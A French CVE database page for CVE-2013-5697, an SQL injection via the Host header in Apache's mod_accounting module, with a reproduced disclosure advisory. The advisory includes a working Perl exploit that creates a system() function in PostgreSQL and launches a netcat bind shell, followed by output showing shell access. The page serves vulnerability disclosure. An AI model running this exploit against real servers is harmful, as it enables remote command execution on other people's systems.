CVE-2013-5697
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
SQL injection vulnerability in mod_accounting.c in the mod_accounting module 0.5 and earlier for Apache allows remote attackers to execute arbitrary SQL commands via a Host header.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | [email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 28653
Date de publication : 2013-09-29 22h00 +00:00
Auteur : Wireghoul
EDB Vérifié : No
- Affected Vendor: http://sourceforge.net/projects/mod-acct/files/
- Affected Software: mod_accounting
- Affected Version: 0.5. Other earlier versions may be affected.
- Issue type: Blind SQL injection
- Release Date: 20 Sep 2013
- Discovered by: Eldar "Wireghoul" Marcussen
- CVE Identifier: CVE-2013-5697
- Issue status: Abandoned software, no patch available
Summary
mod_accounting is a traffic accounting module for Apache 1.3.x which
records traffic numbers in a database. Both MySQL and PostgreSQL database
types are supported. It supports arbitrary database designs as traffic
recording is performed via a user defined query in the Apache configuration
using placeholders for received values. The following is an example
configuration:
<VirtualHost _default_:*>
DocumentRoot "/var/www/"
Options Indexes
AccountingQueryFmt "INSERT INTO accounting VALUES( current_time, %r, %s,
'%u', '%h' );"
AccountingDatabase accounting
AccountingDatabaseDriver postgres
AccountingDBHost localhost 5432
AccountingLoginInfo acct acct
</VirtualHost>
As user supplied values are not sanitised before being used in the
placeholder values it is possible for an attacker to supply malicous values
to perform blind SQL injection.
Description
The SQL injection occurs due to a user supplied HTTP header being used in
the query without sanitisation. The module uses a simple string
concatination approach to modify the placeholders in the user defined query
before sending it to the database. This code can be located in
mod_accounting.c:
409: // build the query string from the template
410: while( ptr ) {
411: char *next;
412:
413: next = strchr( ptr, '%' );
414:
415: if( next ) {
416: char tmp[ 2 ];
417:
418: *next++ = '\0';
419:
420: switch( *next++ ) {
421:
422: case 'h':
423: query = ap_pstrcat( p, query, ptr, cfg->ServerName ?
cfg->ServerName : "-", NULL );
424: break;
425:
426: case 's':
427: query = ap_pstrcat( p, query, ptr, sent, NULL );
428: break;
429:
430: case 'r':
431: query = ap_pstrcat( p, query, ptr, recvd, NULL );
432: break;
433:
434: case 'u':
435: query = ap_pstrcat( p, query, ptr, get_user( r ), NULL
);
436: break;
437:
438: default:
439: tmp[0] = next[ -1 ];
440: tmp[1] = '\0';
441:
442: query = ap_pstrcat( p, query, ptr, tmp, NULL );
443: break;
444: }
445:
446: next[ -2 ] = '%';
447:
448: } else
449: query = ap_pstrcat( p, query, ptr, NULL );
450:
451: ptr = next;
452: }
453:
454: ( *DBDrivers[ cfg->DBDriver ].Query )( cfg, server, p, query );
455:
456: cfg->Received = cfg->Sent = 0;
It is important to note that the database query takes place after the page
has been served, hence there is no easy way to determine if a particular
injection method was successful apart from using an out of band approach.
However, as the injection occurs in an insert statement it is likely that
the successful injection vector is one of about a handful of likely
candidates.
Impact
An attacker is only limited by the capabilities of the database
configuration and may be able to read, add, alter or delete data from your
database(s), read or write arbitrary files or even execute commands on the
server given a privileged database account.
Proof of Concept
root@bt:~/sploit-dev# cat mod_accounting-rce.pl
#!/usr/bin/perl
# PoC of blind SQL injection in the mod_accounting/0.5 Apache module
# Injection can occur via the Host header
# As the injection occurs in a user defined insert statement a bit of trial
and error is required
# Database operations occurs asyncronous to page response so timing attacks
wont work
# This one is completely blind
# DB can be mysql or postgres, this PoC only covers postgres
# PoC executes netcat to listen on port 4444 (requires dba privileges)
use IO::Socket::INET;
print "#----------------------------------------------#\n";
print "| mod_accounting/0.5 PoC exploit by \@Wireghoul |\n";
print "| www.justanotherhacker.com |\n";
print "#----------Command execution via SQLi----------#\n";
print "[*] Enumerating blind injection vectors:\n";
my @endings = ("'));", '"));', "));", "');", '");', ");", "';", '";',";");
# These should terminate most insert statements
#my @endings = ( "');" );
my $shell = 'nc -lnp 4444 -e /bin/sh';
my $cnt = 0;
my $content = "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS
'/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
foreach $end (@endings) {
$cnt++;
my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to
connect to $ARGV[0]:$ARGV[1]: $!\n";
my $str = "GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content --
\r\n\r\n"; # from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; --
\r\n\r\n";
print "[-] Trying $end\n";
print $sock $str;
#print "Sent $end\n";
close ($sock);
}
print "[*] Done, remote server should have executed $shell\n";
Execution of PoC:
--------------------------------------------------
root@bt:~/sploit-dev# nc 192.168.58.138 4444
(UNKNOWN) [192.168.58.138] 4444 (?) : Connection refused
root@bt:~/sploit-dev# perl mod_accounting-rce.pl 192.168.58.138 80
#----------------------------------------------#
| mod_accounting/0.5 PoC exploit by @Wireghoul |
| www.justanotherhacker.com |
#----------Command execution via SQLi----------#
[*] Enumerating blind injection vectors:
[-] Trying '));
[-] Trying "));
[-] Trying ));
[-] Trying ');
[-] Trying ");
[-] Trying );
[-] Trying ';
[-] Trying ";
[-] Trying ;
[*] Done, remote server should have executed nc -lnp 4444 -e /bin/sh
root@bt:~/sploit-dev# nc 192.168.58.138 4444
pwd
/var/lib/postgres/data/base/17142
id
uid=101(postgres) gid=104(postgres) groups=104(postgres)
hostname
sarge
^C
Solution
As the module is no longer supported, discontinue the use of this module.
Response Timeline
- 03/09/2013 - Vendor notified
- 03/09/2013 - Vendor acknowledge vulnerability
- 04/09/2013 - Project download removed and website updated to reflect
new status
- 20/09/2013 - Advisory released
Products Mentioned
Configuraton 0
Simone_tellini>>Mod_accounting >> Version To (including) 0.5
- Simone_tellini>>Mod_accounting >> Version 0.5 (Open CPE detail)
Apache>>Http_server >> Version 1.3
- Apache>>Http_server >> Version 1.3 (Open CPE detail)
Apache>>Http_server >> Version 1.3.0
- Apache>>Http_server >> Version 1.3.0 (Open CPE detail)
Apache>>Http_server >> Version 1.3.1
- Apache>>Http_server >> Version 1.3.1 (Open CPE detail)
Apache>>Http_server >> Version 1.3.1.1
- Apache>>Http_server >> Version 1.3.1.1 (Open CPE detail)
Apache>>Http_server >> Version 1.3.2
- Apache>>Http_server >> Version 1.3.2 (Open CPE detail)
Apache>>Http_server >> Version 1.3.3
- Apache>>Http_server >> Version 1.3.3 (Open CPE detail)
Apache>>Http_server >> Version 1.3.4
- Apache>>Http_server >> Version 1.3.4 (Open CPE detail)
Apache>>Http_server >> Version 1.3.5
- Apache>>Http_server >> Version 1.3.5 (Open CPE detail)
Apache>>Http_server >> Version 1.3.6
- Apache>>Http_server >> Version 1.3.6 (Open CPE detail)
Apache>>Http_server >> Version 1.3.7
- Apache>>Http_server >> Version 1.3.7 (Open CPE detail)
Apache>>Http_server >> Version 1.3.8
- Apache>>Http_server >> Version 1.3.8 (Open CPE detail)
Apache>>Http_server >> Version 1.3.9
- Apache>>Http_server >> Version 1.3.9 (Open CPE detail)
Apache>>Http_server >> Version 1.3.10
- Apache>>Http_server >> Version 1.3.10 (Open CPE detail)
Apache>>Http_server >> Version 1.3.11
- Apache>>Http_server >> Version 1.3.11 (Open CPE detail)
Apache>>Http_server >> Version 1.3.12
- Apache>>Http_server >> Version 1.3.12 (Open CPE detail)
Apache>>Http_server >> Version 1.3.13
- Apache>>Http_server >> Version 1.3.13 (Open CPE detail)
Apache>>Http_server >> Version 1.3.14
- Apache>>Http_server >> Version 1.3.14 (Open CPE detail)
Apache>>Http_server >> Version 1.3.15
- Apache>>Http_server >> Version 1.3.15 (Open CPE detail)
Apache>>Http_server >> Version 1.3.16
- Apache>>Http_server >> Version 1.3.16 (Open CPE detail)
Apache>>Http_server >> Version 1.3.17
- Apache>>Http_server >> Version 1.3.17 (Open CPE detail)
Apache>>Http_server >> Version 1.3.18
- Apache>>Http_server >> Version 1.3.18 (Open CPE detail)
Apache>>Http_server >> Version 1.3.19
- Apache>>Http_server >> Version 1.3.19 (Open CPE detail)
Apache>>Http_server >> Version 1.3.20
- Apache>>Http_server >> Version 1.3.20 (Open CPE detail)
Apache>>Http_server >> Version 1.3.22
- Apache>>Http_server >> Version 1.3.22 (Open CPE detail)
Apache>>Http_server >> Version 1.3.23
- Apache>>Http_server >> Version 1.3.23 (Open CPE detail)
Apache>>Http_server >> Version 1.3.24
- Apache>>Http_server >> Version 1.3.24 (Open CPE detail)
Apache>>Http_server >> Version 1.3.25
- Apache>>Http_server >> Version 1.3.25 (Open CPE detail)
Apache>>Http_server >> Version 1.3.26
- Apache>>Http_server >> Version 1.3.26 (Open CPE detail)
Apache>>Http_server >> Version 1.3.27
- Apache>>Http_server >> Version 1.3.27 (Open CPE detail)
Apache>>Http_server >> Version 1.3.28
- Apache>>Http_server >> Version 1.3.28 (Open CPE detail)
Apache>>Http_server >> Version 1.3.29
- Apache>>Http_server >> Version 1.3.29 (Open CPE detail)
Apache>>Http_server >> Version 1.3.30
- Apache>>Http_server >> Version 1.3.30 (Open CPE detail)
Apache>>Http_server >> Version 1.3.31
- Apache>>Http_server >> Version 1.3.31 (Open CPE detail)
Apache>>Http_server >> Version 1.3.32
- Apache>>Http_server >> Version 1.3.32 (Open CPE detail)
Apache>>Http_server >> Version 1.3.33
- Apache>>Http_server >> Version 1.3.33 (Open CPE detail)
Apache>>Http_server >> Version 1.3.34
- Apache>>Http_server >> Version 1.3.34 (Open CPE detail)
Apache>>Http_server >> Version 1.3.35
- Apache>>Http_server >> Version 1.3.35 (Open CPE detail)
Apache>>Http_server >> Version 1.3.36
- Apache>>Http_server >> Version 1.3.36 (Open CPE detail)
Apache>>Http_server >> Version 1.3.37
- Apache>>Http_server >> Version 1.3.37 (Open CPE detail)
Apache>>Http_server >> Version 1.3.38
- Apache>>Http_server >> Version 1.3.38 (Open CPE detail)
Apache>>Http_server >> Version 1.3.39
- Apache>>Http_server >> Version 1.3.39 (Open CPE detail)
Apache>>Http_server >> Version 1.3.41
- Apache>>Http_server >> Version 1.3.41 (Open CPE detail)
Apache>>Http_server >> Version 1.3.42
- Apache>>Http_server >> Version 1.3.42 (Open CPE detail)
Apache>>Http_server >> Version 1.3.65
- Apache>>Http_server >> Version 1.3.65 (Open CPE detail)
Apache>>Http_server >> Version 1.3.68
- Apache>>Http_server >> Version 1.3.68 (Open CPE detail)
Références
2025©
tesweb SA
